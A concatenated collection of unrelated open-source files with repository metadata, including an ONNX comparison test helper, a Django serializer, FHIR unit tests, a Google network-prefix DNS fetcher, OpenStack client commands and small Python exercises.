        ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
        if ort_optimize
        else ort.GraphOptimizationLevel.ORT_DISABLE_ALL
    )
    sess = ort.InferenceSession(onnx_model_path, sess_options=ort_sess_opt)
    onnx_model_dir.cleanup()
    # This helper only supports single-output jobs with at most one input.
    assert len(sess.get_outputs()) == 1
    assert len(sess.get_inputs()) <= 1
    ipt_dict = OrderedDict()
    for ipt in sess.get_inputs():
        # Random float32 inputs in [-10, 10); the same tensors are fed to
        # both runtimes so the outputs are directly comparable.
        ipt_data = np.random.uniform(low=-10, high=10, size=ipt.shape).astype(
            np.float32
        )
        ipt_dict[ipt.name] = ipt_data
    onnx_res = sess.run([], ipt_dict)[0]
    oneflow_res = job_func(*ipt_dict.values()).get().numpy()
    rtol, atol = 1e-2, 1e-5
    if print_outlier:
        a = onnx_res.flatten()
        b = oneflow_res.flatten()
        for i in range(len(a)):
            if np.abs(a[i] - b[i]) > atol + rtol * np.abs(b[i]):
                print("a[{}]={}, b[{}]={}".format(i, a[i], i, b[i]))
    assert np.allclose(onnx_res, oneflow_res, rtol=rtol, atol=atol)
|
[
"noreply@github.com"
] |
ashing-zhang.noreply@github.com
|
cec1ac5c978a20fda316ddf1475bffc7cc5c0a85
|
b91578b96ffe63639d3efc70d4737b92091cd0b1
|
/backend/unpp_api/apps/sanctionslist/serializers.py
|
3d57ed5f866b73fbe8dde2953857e5e283fedb35
|
[
"Apache-2.0"
] |
permissive
|
unicef/un-partner-portal
|
876b6ec394909ed2f72777493623413e9cecbfdc
|
73afa193a5f6d626928cae0025c72a17f0ef8f61
|
refs/heads/develop
| 2023-02-06T21:08:22.037975
| 2019-05-20T07:35:29
| 2019-05-20T07:35:29
| 96,332,233
| 6
| 1
|
Apache-2.0
| 2023-01-25T23:21:41
| 2017-07-05T15:07:44
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 633
|
py
|
from rest_framework import serializers
from sanctionslist.models import SanctionedNameMatch
class SanctionedNameMatchSerializer(serializers.ModelSerializer):
    """Serializer for SanctionedNameMatch rows, adding read-only
    human-readable display values alongside the raw type codes."""
    # Pulled through the related name -> item chain; read-only.
    sanctioned_type = serializers.CharField(source='name.item.sanctioned_type', read_only=True)
    sanctioned_type_display = serializers.CharField(source='name.item.get_sanctioned_type_display', read_only=True)
    match_type_display = serializers.CharField(source='get_match_type_display', read_only=True)
    class Meta:
        model = SanctionedNameMatch
        # Internal moderation fields are not exposed through the API.
        exclude = (
            'partner',
            'can_ignore',
            'can_ignore_text',
        )
|
[
"maciej.jaworski@tivix.com"
] |
maciej.jaworski@tivix.com
|
b0ad500120f8469b888e170431f17043052f3e7c
|
d57148c74b79954ff762ce3a02c1b0ef3e79d6a1
|
/libs/smartmeshsdk-REL-1.3.0.1/libs/VManagerSDK/vmanager/models/net_reset_info.py
|
f58017d71ca05bfc882e34f73a9d91a3d9409ea4
|
[
"BSD-3-Clause"
] |
permissive
|
realms-team/solmanager
|
62fb748b140361cf620b7dd8ff6df755afd42bbe
|
95fa049df041add5f8d37c053ef560d0e5d06dff
|
refs/heads/master
| 2020-04-11T10:00:21.086457
| 2018-11-20T15:49:27
| 2018-11-20T15:49:27
| 40,271,406
| 0
| 0
|
BSD-3-Clause
| 2018-11-20T15:49:28
| 2015-08-05T22:15:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,061
|
py
|
# coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetResetInfo(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self):
        """
        NetResetInfo - a model defined in Swagger
        :param dict swaggerTypes: The key is attribute name
        and the value is attribute type.
        :param dict attributeMap: The key is attribute name
        and the value is json key in definition.
        """
        # Maps attribute name -> declared Swagger type (used by to_dict()).
        self.swagger_types = {
            'reload': 'bool'
        }
        # Maps attribute name -> JSON key used on the wire.
        self.attribute_map = {
            'reload': 'reload'
        }
        self._reload = None
    @property
    def reload(self):
        """
        Gets the reload of this NetResetInfo.
        reload configuration after reset
        :return: The reload of this NetResetInfo.
        :rtype: bool
        """
        return self._reload
    @reload.setter
    def reload(self, reload):
        """
        Sets the reload of this NetResetInfo.
        reload configuration after reset
        :param reload: The reload of this NetResetInfo.
        :type: bool
        """
        self._reload = reload
    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}
        # Walk the declared attributes, recursively serializing any nested
        # models (objects exposing a to_dict method) and lists thereof.
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            else:
                result[attr] = value
        return result
    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())
    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()
    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # NOTE(review): assumes `other` exposes __dict__; comparing against
        # a plain value (e.g. int) would raise AttributeError — confirm
        # whether newer generator templates add an isinstance guard.
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
[
"twatteyne@gmail.com"
] |
twatteyne@gmail.com
|
9c50ac850f1e9d03b9356f0e58aa62b4a72ac2d5
|
be61a9f30274514857ea34297719157f1e5b8447
|
/fhir/resources/DSTU2/tests/test_provenance.py
|
7ef6baef182c10f5c8210085602e62a429fe450a
|
[
"BSD-3-Clause"
] |
permissive
|
jwygoda/fhir.resources
|
ceff3a620100d2e875136b86d3e82816c0e60a33
|
5053565570d1ca992d9971d20db813c53fd350b9
|
refs/heads/master
| 2021-02-05T02:59:17.436485
| 2019-07-18T10:57:33
| 2019-07-18T10:57:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,361
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2019-05-14.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import provenance
from .fhirdate import FHIRDate
class ProvenanceTests(unittest.TestCase):
    """Generated round-trip tests for the DSTU2 Provenance resource.

    Each test loads a JSON example, checks the parsed model's fields,
    serializes it back with as_json(), re-parses the result and checks the
    same fields again to verify the round trip is lossless.
    """
    def instantiate_from(self, filename):
        # FHIR_UNITTEST_DATADIR points at the directory of example resources
        # (falls back to the current directory when unset).
        datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
        with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
            js = json.load(handle)
            self.assertEqual("Provenance", js["resourceType"])
        return provenance.Provenance(js)
    def testProvenance1(self):
        # Parse, verify, serialize, re-parse, verify again.
        inst = self.instantiate_from("provenance-example.json")
        self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
        self.implProvenance1(inst)
        js = inst.as_json()
        self.assertEqual("Provenance", js["resourceType"])
        inst2 = provenance.Provenance(js)
        self.implProvenance1(inst2)
    def implProvenance1(self, inst):
        # Field-by-field expectations for provenance-example.json.
        self.assertEqual(inst.agent[0].relatedAgent[0].target, "#a1")
        self.assertEqual(inst.agent[0].relatedAgent[0].type.text, "used")
        self.assertEqual(inst.agent[0].role.code, "author")
        self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
        self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
        self.assertEqual(inst.agent[0].userId.value, "hhd")
        self.assertEqual(inst.agent[1].id, "a1")
        self.assertEqual(inst.agent[1].role.code, "DEV")
        self.assertEqual(inst.agent[1].role.system, "http://hl7.org/fhir/v3/ParticipationType")
        self.assertEqual(inst.entity[0].display, "CDA Document in XDS repository")
        self.assertEqual(inst.entity[0].reference, "DocumentReference/90f55916-9d15-4b8f-87a9-2d7ade8670c8")
        self.assertEqual(inst.entity[0].role, "source")
        self.assertEqual(inst.entity[0].type.code, "57133-1")
        self.assertEqual(inst.entity[0].type.display, "Referral note")
        self.assertEqual(inst.entity[0].type.system, "http://loinc.org")
        self.assertEqual(inst.id, "example")
        self.assertEqual(inst.period.start.date, FHIRDate("2015-06-27").date)
        self.assertEqual(inst.period.start.as_json(), "2015-06-27")
        self.assertEqual(inst.policy[0], "http://acme.com/fhir/Consent/25")
        self.assertEqual(inst.reason[0].coding[0].code, "3457005")
        self.assertEqual(inst.reason[0].coding[0].display, "Referral")
        self.assertEqual(inst.reason[0].coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.reason[0].text, "Accepting a referral")
        self.assertEqual(inst.recorded.date, FHIRDate("2015-06-27T08:39:24+10:00").date)
        self.assertEqual(inst.recorded.as_json(), "2015-06-27T08:39:24+10:00")
        self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
        self.assertEqual(inst.text.status, "generated")
    def testProvenance2(self):
        # Same round-trip check for the digital-signature example.
        inst = self.instantiate_from("provenance-example-sig.json")
        self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
        self.implProvenance2(inst)
        js = inst.as_json()
        self.assertEqual("Provenance", js["resourceType"])
        inst2 = provenance.Provenance(js)
        self.implProvenance2(inst2)
    def implProvenance2(self, inst):
        # Field-by-field expectations for provenance-example-sig.json.
        self.assertEqual(inst.activity.coding[0].code, "AU")
        self.assertEqual(inst.activity.coding[0].display, "authenticated")
        self.assertEqual(inst.activity.coding[0].system, "http://hl7.org/fhir/v3/DocumentCompletion")
        self.assertEqual(inst.agent[0].role.code, "verifier")
        self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
        self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
        self.assertEqual(inst.agent[0].userId.value, "hhd")
        self.assertEqual(inst.id, "signature")
        self.assertEqual(inst.reason[0].coding[0].code, "TREAT")
        self.assertEqual(inst.reason[0].coding[0].display, "treatment")
        self.assertEqual(inst.reason[0].coding[0].system, "http://hl7.org/fhir/v3/ActReason")
        self.assertEqual(inst.recorded.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
        self.assertEqual(inst.recorded.as_json(), "2015-08-27T08:39:24+10:00")
        self.assertEqual(inst.signature[0].blob, "Li4u")
        self.assertEqual(inst.signature[0].contentType, "application/signature+xml")
        self.assertEqual(inst.signature[0].type[0].code, "1.2.840.10065.1.12.1.5")
        self.assertEqual(inst.signature[0].type[0].display, "Verification")
        self.assertEqual(inst.signature[0].type[0].system, "http://hl7.org/fhir/valueset-signature-type")
        self.assertEqual(inst.signature[0].when.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
        self.assertEqual(inst.signature[0].when.as_json(), "2015-08-27T08:39:24+10:00")
        self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
        self.assertEqual(inst.text.status, "generated")
|
[
"connect2nazrul@gmail.com"
] |
connect2nazrul@gmail.com
|
060cab4de8f90448bb3a7351dec20cafcc81a448
|
3b593b412c663a34784b1f60ad07cd2ee6ef87d1
|
/month01/python base/day04/exercise05.py
|
37e1bf28579cef5876ac0302e9c634075a9418dc
|
[] |
no_license
|
ShijieLiu-PR/Python_Learning
|
88694bd44aeed4f8b022202c1065342bd17c26d2
|
ed01cc0956120ea287c51667604db97ff563c829
|
refs/heads/master
| 2023-05-22T16:35:24.252313
| 2021-06-16T10:56:21
| 2021-06-16T10:56:21
| 337,445,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
# Exercise 5: read an integer from the console and draw a hollow square
# of '*' characters with that side length, e.g. for 4:
#
#   ****
#   *  *
#   *  *
#   ****
edge = int(input("Please input an int:"))
for row in range(edge):
    # First and last rows are solid; middle rows keep only the borders.
    if row in (0, edge - 1):
        print("*" * edge)
    else:
        print("*" + " " * (edge - 2) + "*")
|
[
"shijie_liu@outlook.com"
] |
shijie_liu@outlook.com
|
3ca4847d2fcea8e14b515ef04ca57fdbab37f57c
|
4f770819f1b9ce66c847873f02d65a7250d3c0b9
|
/myapp/test.py
|
ffb04a90d437b452a9827535e387313d97b522c9
|
[] |
no_license
|
alexaugusto23/Moscow_Ring_Road_Coordinates
|
58ec6b606679aab34d0941b7c57374071b3821ad
|
51daf7f88e9b2c02df174a44931c86afc079aeb1
|
refs/heads/main
| 2023-08-31T14:26:08.446962
| 2021-09-19T01:43:21
| 2021-09-19T01:43:21
| 405,960,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,427
|
py
|
import unittest
from app import app
import re
class TestHomeView(unittest.TestCase):
    '''
    As all 3 test cases do a get home "/"
    from our application, we define the setUp function. she is executed
    automatically whenever unittest instantiates the TestHomeView class.
    The setUp function is similar to a constructor method.
    '''
    def setUp(self):
        # Fresh test client per test; fetch both routes up front.
        my_app = app.test_client()
        self.response_root = my_app.get('/')
        self.response_form = my_app.get('/form')
    # Test that the response status is 200 ("ok")
    def test_get(self):
        self.assertEqual(200, self.response_root.status_code)
    # Test that the home response has the correct content type
    def test_content_type(self):
        self.assertIn('text/html', self.response_root.content_type)
    # Test that the /form response matches the expected pattern exactly
    def test_html_string_response(self):
        string = self.response_form.data.decode('utf-8')
        print(string)
        # NOTE(review): appears to expect the whole body to be
        # "<digits> <two lowercase letters>" — confirm against the app.
        padrao = "([0-9]{0,1000000000}) ([a-z]{2})"
        resposta = re.search(padrao, string).group()
        print(resposta)
        self.assertEqual( resposta, self.response_form.data.decode('utf-8') )
if __name__ == '__main__':
    # Send the unittest report to a log file instead of stderr.
    log_file = 'log_file.txt'
    with open(log_file, "w") as file:
        runner = unittest.TextTestRunner(file)
        # unittest.main() raises SystemExit when the run finishes; the
        # with-block still closes the file on the way out. The previous
        # trailing runner.close() was unreachable dead code and would have
        # raised AttributeError anyway (TextTestRunner has no close()).
        unittest.main(testRunner=runner)
# python -m unittest test.py
|
[
"contato.alexaugusto@hotmail.com"
] |
contato.alexaugusto@hotmail.com
|
be1ad681d98b756c3bd0497d05278e59db83c92b
|
5017db085d3316e7954fa9beb258ab964cc0beb5
|
/netlookup/network_sets/google.py
|
6e6626a13ab2d04d3ad71db33ae57441be13b84c
|
[
"BSD-3-Clause"
] |
permissive
|
hile/netlookup
|
698e68577096fbb74daa9ba205624ddc49b357e4
|
1bc00271500d4daa279acc11590b5dcf40a0b85e
|
refs/heads/main
| 2023-07-19T20:43:42.855035
| 2023-07-09T03:02:00
| 2023-07-09T03:02:00
| 191,030,505
| 0
| 0
|
NOASSERTION
| 2023-02-11T02:23:41
| 2019-06-09T16:36:59
|
Python
|
UTF-8
|
Python
| false
| false
| 3,324
|
py
|
#
# Copyright (C) 2020-2023 by Ilkka Tuohela <hile@iki.fi>
#
# SPDX-License-Identifier: BSD-3-Clause
#
"""
Google services address prefix set
"""
import re
from datetime import datetime
from operator import attrgetter
from typing import Optional
from dns import resolver
from ..exceptions import NetworkError
from .base import NetworkSet, NetworkSetItem
RE_INCLUDE = re.compile(r'^include:(?P<rr>.*)$')
RE_IPV4 = re.compile(r'^ip4:(?P<prefix>.*)$')
RE_IPV6 = re.compile(r'^ip6:(?P<prefix>.*)$')
GOOGLE_CLOUD_ADDRESS_LIST_RECORD = '_cloud-netblocks.googleusercontent.com'
GOOGLE_SERVICES_ADDRESS_LIST_RECORD = '_spf.google.com'
def google_rr_dns_query(record: str) -> Optional[str]:
    """
    Resolve a TXT record and return its first string value decoded as UTF-8.

    Raises NetworkError when the record does not exist or has no answer.
    """
    try:
        answer = resolver.resolve(record, 'TXT')
    except (resolver.NoAnswer, resolver.NXDOMAIN) as error:
        raise NetworkError(f'Error querying TXT record for {record}: {error}') from error
    return str(answer.rrset[0].strings[0], 'utf-8')
def process_google_rr_ranges(record: str, loader_class):
    """
    Parse an SPF-style TXT record into network prefixes.

    ip4:/ip6: fields are wrapped in loader_class; include: fields reference
    further TXT records and are flattened recursively.
    """
    networks = []
    for field in google_rr_dns_query(record).split(' '):
        # A field matches at most one of the prefix patterns.
        prefix_match = RE_IPV4.match(field) or RE_IPV6.match(field)
        if prefix_match:
            networks.append(loader_class(prefix_match.groupdict()['prefix']))
            continue
        include_match = RE_INCLUDE.match(field)
        if include_match:
            networks.extend(
                process_google_rr_ranges(include_match.groupdict()['rr'], loader_class)
            )
    return networks
class GoogleNetworkSet(NetworkSet):
    """
    Google network set with data for TXT DNS records
    """
    @property
    def __address_list_record__(self) -> None:
        # Abstract hook: concrete subclasses return the TXT record name to query.
        raise NotImplementedError

    def fetch(self) -> None:
        """
        Fetch Google Cloud network records from DNS
        """
        # Replace any previously fetched data rather than appending to it.
        self.__networks__.clear()
        networks = process_google_rr_ranges(self.__address_list_record__, self.loader_class)
        for network in networks:
            self.__networks__.append(network)
        self.updated = datetime.now()
        # Keep networks ordered by IP version first, then by CIDR.
        self.__networks__.sort(key=attrgetter('version', 'cidr'))
class GoogleCloudPrefix(NetworkSetItem):
    """
    Google cloud network prefix
    """
    # Tag identifying the prefix's origin (used when cached/serialized).
    type = 'google-cloud'
class GoogleCloud(GoogleNetworkSet):
    """
    Google Cloud address ranges
    """
    type: str = 'google-cloud'
    cache_filename: str = 'google-cloud-networks.json'
    loader_class = GoogleCloudPrefix

    @property
    def __address_list_record__(self) -> str:
        # TXT record that enumerates Google Cloud netblocks.
        return GOOGLE_CLOUD_ADDRESS_LIST_RECORD
class GoogleServicePrefix(NetworkSetItem):
    """
    Google services network prefix
    """
    # Tag identifying the prefix's origin (used when cached/serialized).
    type = 'google'
class GoogleServices(GoogleNetworkSet):
    """
    Google services address ranges
    """
    type: str = 'google'
    cache_filename: str = 'google-service-networks.json'
    loader_class = GoogleServicePrefix

    @property
    def __address_list_record__(self) -> str:
        # SPF TXT record that enumerates Google service address ranges.
        return GOOGLE_SERVICES_ADDRESS_LIST_RECORD
|
[
"hile@iki.fi"
] |
hile@iki.fi
|
1c9ad65b85f7f793307ac30b98a6775a9dee079b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_173/ch20_2020_03_04_20_04_41_273583.py
|
24e06e78098124022a59a5bfb6d4b88ca932758a
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 188
|
py
|
distancia = float(input('Escreva a distância que você quer percorrer em km'))
# Fare rule: R$0.50/km for trips up to 200 km; longer trips pay R$0.45/km
# plus a flat R$100 surcharge.
if distancia <= 200:
    valor = 0.5*distancia
else:
    valor = 0.45*distancia + 100
# Bug fix: the computed fare was never shown — the script printed the
# distance the user had just typed instead of `valor`.
print (valor)
|
[
"you@example.com"
] |
you@example.com
|
3a7381f58e016c17acdda37ca348942621b67a30
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02269/s429567531.py
|
b6858b987c9d3f9e958f07c18273052b8af703cd
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 352
|
py
|
# NOTE: this is Python 2 code (print statements, raw_input).
def insert(S, string):
    # Add string to the dictionary set S; duplicates are absorbed by the set.
    S.add(string)
def find(S, string):
    # Report whether string was previously inserted.
    if string in S:
        print 'yes'
    else:
        print 'no'
n = input()
S = set()
# Each of the n lines is "<command> <string>" with command insert|find.
for i in range(n):
    tmp1, tmp2 = map(str, raw_input().split())
    if tmp1 == 'insert':
        insert(S, tmp2)
    elif tmp1 == 'find':
        find(S, tmp2)
    else:
        print 'error!'
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
ef505cea73e5c3037f00f3f90d9413b53a1b61a9
|
f5d43e47e375d6d337b919b8eb7f3393e4687864
|
/lpthw/31-40/ex40_test.py
|
989e12ee9cc1788d320fcf11b770a64ba098454b
|
[] |
no_license
|
Cadols/LearnPython
|
4a2c202b30a1d877ec75e0ec45b03f9f1c2bc52a
|
2ab5cefe1f7e2c0393489e3d1d4d0c88557c2ebb
|
refs/heads/master
| 2021-01-12T09:49:48.335014
| 2019-05-24T06:53:42
| 2019-05-24T06:53:42
| 76,265,981
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,081
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Song(object):
    """A song represented as an ordered list of lyric lines."""

    def __init__(self, lyrics):
        # Keep the lines exactly as supplied; they are printed verbatim.
        self.lyrics = lyrics

    def sing_me_a_song(self):
        """Print every lyric line on its own line, in order."""
        for lyric_line in self.lyrics:
            print(lyric_line)
# Build two songs from inline lyric lists and sing (print) them.
twinkle_twinkle_little_star = Song(["Twinkle twinkle little star",
                            "How I wonder what you are",
                            "Up above in the sky",
                            "Like a diamond in the sky"])
alphabet_song = Song(["A B C D E F G",
                      "H I J K L M N",
                      "O P Q",
                      "R S T",
                      "U V W",
                      "X Y Z"])
twinkle_twinkle_little_star.sing_me_a_song()
alphabet_song.sing_me_a_song()
# Same two songs again, this time binding the lyric lists to names first.
song_a_lyrics = ["Twinkle twinkle little star", "How I wonder what you are", "Up above in the sky", "Like a diamond in the sky"]
song_b_lyrics = ["A B C D E F G", "H I J K L M N", "O P Q", "R S T", "U V W", "X Y Z"]
song_a = Song(song_a_lyrics)
song_b = Song(song_b_lyrics)
song_a.sing_me_a_song()
song_b.sing_me_a_song()
|
[
"wangwei150@gmail.com"
] |
wangwei150@gmail.com
|
39420f4dd8ab7e282152b8a385260ae3dba14513
|
a5c4e1ab36972c0bbc2526612a9ade95768b32b1
|
/ailtdou/main/views.py
|
0b1bc567a56e9b5a702bf5eee1b8e4cb4008b087
|
[] |
no_license
|
tonyseek/ailtdou
|
5587e76e3c34b3533c73d2acded5b8134bbd8ad3
|
435cad7fd127a6fc7974b1413ec0299ca2dd359d
|
refs/heads/master
| 2021-01-23T00:14:55.509037
| 2018-10-13T12:46:27
| 2018-10-13T12:46:27
| 19,821,141
| 0
| 0
| null | 2018-08-14T07:14:38
| 2014-05-15T13:54:50
|
Python
|
UTF-8
|
Python
| false
| false
| 286
|
py
|
from flask import Blueprint, render_template
from flask_login import current_user
# Blueprint holding the site's main (root) routes.
bp = Blueprint('main', __name__)
@bp.route('/')
def home():
    """Render the login page for anonymous visitors, else the user page."""
    # NOTE(review): is_anonymous is called as a method here; in newer
    # flask-login releases it is a property — confirm the pinned version.
    if current_user.is_anonymous():
        return render_template('login.html')
    return render_template('user.html', user=current_user)
|
[
"tonyseek@gmail.com"
] |
tonyseek@gmail.com
|
c6443e9e4d16553be2ab62035dacb3504dc0b0e7
|
94ca446c0f17d640f45941fa7c83530ef2fbc099
|
/wrs-remote-clients-2.0.2/python-openstackclient-3.12.0/build/lib/openstackclient/network/v2/setting.py
|
d404325e8ea16391d3a58e77a79b68bf48806a91
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
rmoorewrs/tic-windows-remote-clients
|
c1c2b8924e90ffd2951571bc098ec9873ffd3988
|
ae16ee78a720852304d79f8b86dfe44e920cc72d
|
refs/heads/master
| 2023-05-25T13:55:55.603100
| 2019-05-31T20:59:28
| 2019-05-31T20:59:28
| 189,649,925
| 0
| 0
|
NOASSERTION
| 2023-05-22T20:43:59
| 2019-05-31T19:46:28
|
Python
|
UTF-8
|
Python
| false
| false
| 6,210
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# The right to copy, distribute, modify, or otherwise make use
# of this software may be licensed only pursuant to the terms
# of an applicable Wind River license agreement.
#
"""Settings action implementations"""
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
from openstackclient.identity import common as identity_common
from openstackclient.network import common
from openstackclient.network import sdk_utils
_formatters = {}
def _get_columns(item):
    """Map the SDK resource's columns to display columns for `setting show`."""
    # The SDK exposes the project id under "id"; "name" carries no meaning
    # for settings, so hide it from the output.
    return sdk_utils.get_osc_show_columns_for_sdk_resource(
        item,
        {"id": "project_id"},
        ["name"],
    )
def _get_attrs(client_manager, parsed_args):
attrs = {key: parsed_args[key] for key in ["mac_filtering"]
if key in parsed_args}
if 'project' in parsed_args and parsed_args["project"] is not None:
identity_client = client_manager.identity
project_id = identity_common.find_project(
identity_client,
parsed_args["project"]
).id
attrs['project_id'] = project_id
return attrs
class ListSetting(common.NetworkAndComputeLister):
    """List settings of all projects who have non-default setting values"""

    def update_parser_common(self, parser):
        # Listing takes no extra CLI arguments.
        return parser

    def take_action_network(self, client, parsed_args):
        """Query the network endpoint and yield one row per project setting."""
        columns = (
            'mac_filtering',
            'project_id'
        )
        column_headers = (
            'Mac Filtering',
            'Project ID'
        )
        # The former `args = {}` passed as **kwargs was dead code.
        data = client.settings()
        return (column_headers,
                (utils.get_item_properties(
                    s, columns,
                    formatters=_formatters,
                ) for s in data))

    def take_action_compute(self, client, parsed_args):
        # Settings are only exposed by the network API; the bare `return`
        # that followed this raise was unreachable and has been removed.
        raise exceptions.CommandError("This command needs access to"
                                      " a network endpoint.")
class ShowSetting(common.NetworkAndComputeShowOne):
    """Show settings of a given project"""

    def update_parser_common(self, parser):
        parser.add_argument(
            '--project',
            metavar='<project>',
            help=_("Owner's project (name or ID)"),
            required=False
        )
        return parser

    def take_action_network(self, client, parsed_args):
        """Look up and display the setting object of the requested project."""
        client = self.app.client_manager.network
        # If no project id is specified, operate on the current project.
        args = _get_attrs(self.app.client_manager, vars(parsed_args))
        if "project_id" not in args:
            args["project_id"] = client.find_tenant().project_id
        project_id = args["project_id"]
        obj = client.find_setting(project_id, ignore_missing=False)
        display_columns, columns = _get_columns(obj)
        data = utils.get_item_properties(obj, columns, formatters=_formatters)
        return (display_columns, data)

    def take_action_compute(self, client, parsed_args):
        # Settings are only exposed by the network API; the bare `return`
        # that followed this raise was unreachable and has been removed.
        raise exceptions.CommandError("This command needs access to"
                                      " a network endpoint.")
# this one uses NetworkAndComputeCommand because settings can be deleted
# without a project id
class DeleteSetting(common.NetworkAndComputeCommand):
    """Delete setting"""

    def update_parser_common(self, parser):
        parser.add_argument(
            '--project',
            metavar='<project>',
            help=_("Owner's project (name or ID)"),
            required=False
        )
        return parser

    def take_action_network(self, client, parsed_args):
        """Delete the setting owned by the requested (or current) project."""
        client = self.app.client_manager.network
        # If no project id is specified, operate on the current project.
        args = _get_attrs(self.app.client_manager, vars(parsed_args))
        if "project_id" not in args:
            args["project_id"] = client.find_tenant().project_id
        client.delete_setting(args["project_id"])

    def take_action_compute(self, client, parsed_args):
        # Settings are only exposed by the network API; the bare `return`
        # that followed this raise was unreachable and has been removed.
        raise exceptions.CommandError("This command needs "
                                      "access to a network endpoint.")
class UpdateSetting(command.Command):
    """Set setting properties"""

    def get_parser(self, prog_name):
        parser = super(UpdateSetting, self).get_parser(prog_name)
        parser.add_argument(
            '--project',
            metavar='<project>',
            help=_("Owner's project (name or ID)"),
            required=False
        )
        parser.add_argument('--mac-filtering', metavar='mac_filtering',
                            help="Enable/Disable source MAC filtering"
                                 " on all ports",
                            required=True)
        return parser

    def take_action(self, parsed_args):
        """Update the setting of the requested (or current) project."""
        client = self.app.client_manager.network
        # If no project id is specified, operate on the current project.
        args = _get_attrs(self.app.client_manager, vars(parsed_args))
        if "project_id" not in args:
            args["project_id"] = client.find_tenant().project_id
        project_id = args["project_id"]
        del args['project_id']
        # Ensure the setting exists before attempting the update.
        client.find_setting(project_id, ignore_missing=False)
        if not args:
            msg = "Nothing specified to be set"
            raise exceptions.CommandError(msg)
        client.update_setting(project_id, **args)
|
[
"rmoorewrs@gmail.com"
] |
rmoorewrs@gmail.com
|
108663704ef930b8ae22d2ab13c3c6ab61c0cef9
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_3/Sean223/verify.py
|
9ca777f0f93c2d4c309547e0376387d1fabe7ab7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,426
|
py
|
# Validator for a Code Jam "jamcoin" answer file: checks formatting,
